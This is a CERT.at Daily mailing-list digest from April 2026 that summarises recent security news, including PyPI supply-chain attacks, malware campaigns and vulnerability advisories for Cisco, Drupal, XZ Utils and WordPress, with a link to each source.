https://thehackernews.com/2026/04/cert-ua-impersonation-campaign-spread.html ∗∗∗ Incident Report: LiteLLM/Telnyx supply-chain attacks, with guidance ∗∗∗ --------------------------------------------- This post will drill deeper into two recent supply chain exploits, targeting users of popular PyPI packages - litellm & telnyx. We also provide Python developers and maintainers with guidance on what they can do to prepare and protect themselves from future incidents. --------------------------------------------- https://blog.pypi.org/posts/2026-04-02-incident-report-litellm-telnyx-suppl… ∗∗∗ European Commission cloud breach: a supply-chain compromise ∗∗∗ --------------------------------------------- In the interest of transparency, and in full agreement with the European Commission, CERT-EU is publishing this blog post to inform the wider community about a cybersecurity incident affecting the European Commission’s public website platform “europa.eu” hosted on Amazon Web Services (AWS) cloud infrastructure. --------------------------------------------- https://cert.europa.eu/blog/european-commission-cloud-breach-trivy-supply-c… ∗∗∗ Polizeiliche Anzeigenstatistik 2025: Aktuelle Entwicklungen im Bereich „Internetbetrug“ ∗∗∗ --------------------------------------------- Einen leichten Rückgang bei den Anzeigen, eine dezent gesunkene Aufklärungsquote – und eine Empfehlung für die Watchlist Internet. All das findet sich in der kürzlich veröffentlichten polizeilichen Anzeigenstatistik für das Jahr 2025. --------------------------------------------- https://www.watchlist-internet.at/news/polizeiliche-anzeigenstatistik-202/ ∗∗∗ Achtung Fake-Politiker: Wenn der Finanzminister plötzlich Anlagetipps verschickt ∗∗∗ --------------------------------------------- Wenn Kriminelle sich als bekannte Persönlichkeiten ausgeben, kann das schnell gefährlich werden. Besonders, wenn es um vermeintlich exklusive Anlagemöglichkeiten geht. --------------------------------------------- https://www.watchlist-internet.at/news/achtung-fake-politiker-wenn-der-fina… ∗∗∗ The Invisible Army: Why IP Reputation Fails Against the Rotation Economy ∗∗∗ --------------------------------------------- Attackers route malicious traffic through ordinary home internet connections — and to a reputation feed, the source IP is indistinguishable from a legitimate users connection. GreyNoise analyzed 4 billion sessions over 90 days and found that 39% of unique IPs targeting the edge come from residential address space. 78% vanish after just 1–2 sessions, before any reputation system can flag them. --------------------------------------------- https://www.greynoise.io/blog/invisible-army-why-ip-reputation-fails-agains… ∗∗∗ vSphere and BRICKSTORM Malware: A Defenders Guide ∗∗∗ --------------------------------------------- Building on recent BRICKSTORM research from Google Threat Intelligence Group (GTIG), this post explores the evolving threats facing virtualized environments. These operations directly target the VMware vSphere ecosystem, specifically the vCenter Server Appliance (VCSA) and ESXi hypervisors. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/vsphere-brickstorm… ∗∗∗ You’re Not Supposed To ShareFile With Everyone (Progress ShareFile Pre-Auth RCE Chain CVE-2026-2699 & CVE-2026-2701) ∗∗∗ --------------------------------------------- If you squint and look at the CISA KEV list, you might think its made up exclusively of vulnerabilities in file transfer solutions. While this would be wrong (and you shouldn’t squint, it’s bad for your eyes), file transfer solutions do play a decent role in the CISA KEV list due to how fondly threat actors, APT groups, and ransomware gangs alike perceive them. --------------------------------------------- https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-pr… ∗∗∗ FBI Warns of AVrecon Malware Targeting Network Devices Across 163 Countries ∗∗∗ --------------------------------------------- The router sitting in your home office or small business did not need to be hacked by a skilled operator to end up serving as infrastructure for banking fraud, password attacks, and digital marketplace scams. All it needed was an unpatched vulnerability and a malware dubbed "AVrecon" to infect and sell access to it within minutes. Last month, FBI alongside several international law enforcement agencies took down SocksEscort residential proxy service. --------------------------------------------- https://thecyberexpress.com/fbi-warns-of-avrecon-malware/ ∗∗∗ Vietnam-Linked PXA Stealer Campaign Exploits LinkedIn to Target Professionals Globally ∗∗∗ --------------------------------------------- A newly exposed global malware campaign reveals how PXA Stealer has been wielded by Vietnam‑linked actors to siphon sensitive data from professionals across multiple countries using trusted platforms like LinkedIn. First documented in late 2024, this campaign has evolved into a new threat that leverages social engineering, advanced payload delivery, and stealthy execution to outmaneuver traditional defenses. --------------------------------------------- https://thecyberexpress.com/pxa-stealer-vietnam-linked-actors-linkedin/ ===================== = Vulnerabilities = ===================== ∗∗∗ Critical Cisco IMC auth bypass gives attackers Admin access ∗∗∗ --------------------------------------------- Cisco has patched several critical and high-severity vulnerabilities, including an Integrated Management Controller (IMC) authentication bypass that enables attackers to gain Admin access. --------------------------------------------- https://www.bleepingcomputer.com/news/security/critical-cisco-imc-auth-bypa… ∗∗∗ SAML SSO - Service Provider - Critical - Authentication bypass - SA-CONTRIB-2026-031 ∗∗∗ --------------------------------------------- This module enables you to perform SAML-protocol-based single-sign-on (SSO) on a Drupal site.The module doesnt sufficiently block access, leading to a authentication bypass vulnerability. Solution: Install the latest version. --------------------------------------------- https://www.drupal.org/sa-contrib-2026-031 ∗∗∗ XZ Utils 5.8.3: Sicherheitsupdate mit unklarem Risiko ∗∗∗ --------------------------------------------- Die Entwickler der weitverbreiteten XZ Utils haben eine aktualisierte Version veröffentlicht, die Sicherheitslücken ausbessert. --------------------------------------------- https://www.heise.de/news/XZ-Utils-5-8-3-Sicherheitsupdate-mit-unklarem-Ris… ∗∗∗ 200,000 WordPress Sites Affected by Arbitrary File Move Vulnerability in MW WP Form WordPress Plugin ∗∗∗ --------------------------------------------- On March 16th, 2026, we received a submission for an Arbitrary File Move vulnerability in MW WP Form, a WordPress plugin with more than 200,000 active installations. This vulnerability makes it possible for unauthenticated threat actors to move arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. This vulnerability can only be exploited if the "Saving inquiry data in database" option in the form settings is enabled. --------------------------------------------- https://www.wordfence.com/blog/2026/04/200000-wordpress-sites-affected-by-a… ∗∗∗ LWN Security updates for Thursday ∗∗∗ --------------------------------------------- https://lwn.net/Articles/1066084/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

2026

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

Daily April 2026